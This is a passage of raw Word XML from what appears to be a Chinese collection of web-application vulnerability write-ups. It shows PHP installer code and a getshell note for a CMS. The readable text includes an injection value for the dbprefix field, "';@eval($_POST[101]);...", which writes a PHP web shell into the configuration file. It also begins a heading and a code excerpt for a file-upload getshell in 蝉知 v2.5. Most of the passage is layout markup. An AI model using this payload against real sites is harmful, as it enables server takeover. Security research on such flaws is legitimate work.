      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$dbhost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'dbhost');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$dbport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'dbport');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="81"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$dbname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'dbname');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$dbuser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'dbuser');</w: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139"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="蝉知企业门户系统_v2.5_前台getshell"/>
      <w:bookmarkStart w:id="89" w:name="_bookmark40"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$dbpwd =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'dbpwd')?$this-&gt;input-&gt;post('dbpwd'):'';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$dbprefix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'dbprefix');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$userid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'admin');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 xml:space="preserve">$pwd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>md5(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$this-&gt;input-&gt;post('pwd'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$email = $this-&gt;input-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'email');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="81"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$sub_folder = '/'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>this-&gt;input-&gt;post('base_url').'/';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="127" w:line="283" w:lineRule="auto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</w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>dbhost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>dbport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>dbname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>dbuser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 xml:space="preserve">dbpwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都不能随便乱写，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乱写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装就会出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-79"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>userid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>pwd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>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">sub_folder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是写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入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，不写入配置文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以就剩下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>dbp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">refix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了，所以我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可以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这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造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个字段：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>dbprefix=sb_';@eval ($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>101]);$xxx='</w:t>
      </w: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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>蝉知企</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>业</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>门户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">v2.5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-85"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>roker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="66"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>module/file/control.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s3425" style="position:absolute;margin-left:80.6pt;margin-top:18.35pt;width:337.75pt;height:165.2pt;z-index:8152;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,367" coordsize="6755,3304">
            <v:rect id="_x0000_s3510" style="position:absolute;left:1617;top:372;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3509" style="position:absolute;left:1797;top:615;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3508" style="position:absolute;left:2520;top:615;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3507" style="position:absolute;left:2640;top:615;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3506" style="position:absolute;left:3604;top:615;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3505" style="position:absolute;left:3725;top:615;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3504" style="position:absolute;left:1617;top:878;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3503" type="#_x0000_t75" style="position:absolute;left:1797;top:941;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s3502" style="position:absolute;left:1617;top:1204;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3501" style="position:absolute;left:1797;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3500" style="position:absolute;left:1897;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3499" style="position:absolute;left:1997;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3498" style="position:absolute;left:2097;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3497" style="position:absolute;left:2197;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3496" style="position:absolute;left:2297;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3495" style="position:absolute;left:2397;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3494" style="position:absolute;left:2497;top:1267;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3493" style="position:absolute;left:2597;top:1267;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3492" style="position:absolute;left:3199;top:1267;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3491" style="position:absolute;left:3320;top:1267;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3490" style="position:absolute;left:3440;top:1267;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3489" style="position:absolute;left:3561;top:1267;width:4097;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3488" style="position:absolute;left:1617;top:1530;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3487" style="position:absolute;left:1797;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3486" style="position:absolute;left:1897;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3485" style="position:absolute;left:1997;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3484" style="position:absolute;left:2097;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3483" style="position:absolute;left:2197;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3482" style="position:absolute;left:2297;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3481" style="position:absolute;left:2397;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3480" style="position:absolute;left:2497;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3479" style="position:absolute;left:2597;top:1593;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3478" style="position:absolute;left:3199;top:1593;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3477" style="position:absolute;left:3320;top:1593;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3476" style="position:absolute;left:3440;top:1593;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3475" style="position:absolute;left:3561;top:1593;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3474" style="position:absolute;left:1617;top:1856;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3473" style="position:absolute;left:1797;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3472" style="position:absolute;left:1897;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3471" style="position:absolute;left:1997;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3470" style="position:absolute;left:2097;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3469" style="position:absolute;left:2197;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3468" style="position:absolute;left:2297;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3467" style="position:absolute;left:2397;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3466" style="position:absolute;left:2497;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3465" style="position:absolute;left:2597;top:1919;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3464" style="position:absolute;left:1617;top:2182;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3463" style="position:absolute;left:1797;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3462" style="position:absolute;left:1897;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3461" style="position:absolute;left:1997;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3460" style="position:absolute;left:2097;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3459" style="position:absolute;left:2197;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3458" style="position:absolute;left:2297;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3457" style="position:absolute;left:2397;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3456" style="position:absolute;left:2497;top:2245;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3455" style="position:absolute;left:2597;top:2245;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3454" style="position:absolute;left:1617;top:2508;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3453" style="position:absolute;left:1797;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3452" style="position:absolute;left:1897;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3451" style="position:absolute;left:1997;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3450" style="position:absolute;left:2097;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3449" style="position:absolute;left:2197;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3448" style="position:absolute;left:2297;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3447" style="position:absolute;left:2397;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3446" style="position:absolute;left:2497;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3445" style="position:absolute;left:2597;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3444" style="position:absolute;left:2697;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3443" style="position:absolute;left:2797;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3442" style="position:absolute;left:2897;top:2571;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3441" style="position:absolute;left:2997;top:2571;width:3976;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3440" style="position:absolute;left:6973;top:2571;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3439" style="position:absolute;left:1617;top:2834;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3438" style="position:absolute;left:1797;top:2897;width:3012;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3437" style="position:absolute;left:4809;top:2897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3436" style="position:absolute;left:4930;top:2897;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3435" style="position:absolute;left:5171;top:2897;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3434" style="position:absolute;left:5291;top:2897;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3433" style="position:absolute;left:5532;top:2897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3432" style="position:absolute;left:5653;top:2897;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3431" style="position:absolute;left:6737;top:2897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3430" style="position:absolute;left:6858;top:2897;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3429" style="position:absolute;left:7099;top:2897;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3428" style="position:absolute;left:1617;top:3160;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3427" style="position:absolute;left:1797;top:3223;width:4458;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3426" type="#_x0000_t202" style="position:absolute;left:1614;top:370;width:6750;height:3299" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="20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ajaxUpload($uid)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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$file = $this-&gt;file-&gt;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getUpload(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'imgFile');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="370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$file = 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0]; if($file)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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!$this-&gt;file-&gt;checkSavePath())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send(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array('error' =&gt; 1, 'message' =&gt;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lang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-&gt;file-&gt;errorUnwritable));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2EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="26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Verdana"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s3087" style="width:337.75pt;height:491.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,9824">
            <v:rect id="_x0000_s3424" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3423" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3422" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3421" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3420" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3419" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3418" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3417" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3416" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3415" style="position:absolute;left:985;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3414" style="position:absolute;left:1085;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3413" style="position:absolute;left:1185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3412" style="position:absolute;left:1285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3411" style="position:absolute;left:1385;top:248;width:4338;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3410" style="position:absolute;left:5723;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3409" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3408" style="position:absolute;left:185;top:574;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3407" style="position:absolute;left:2715;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3406" style="position:absolute;left:2836;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3405" style="position:absolute;left:2956;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3404" style="position:absolute;left:3077;top:574;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3403" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3402" style="position:absolute;left:185;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3401" style="position:absolute;left:285;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3400" style="position:absolute;left:385;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
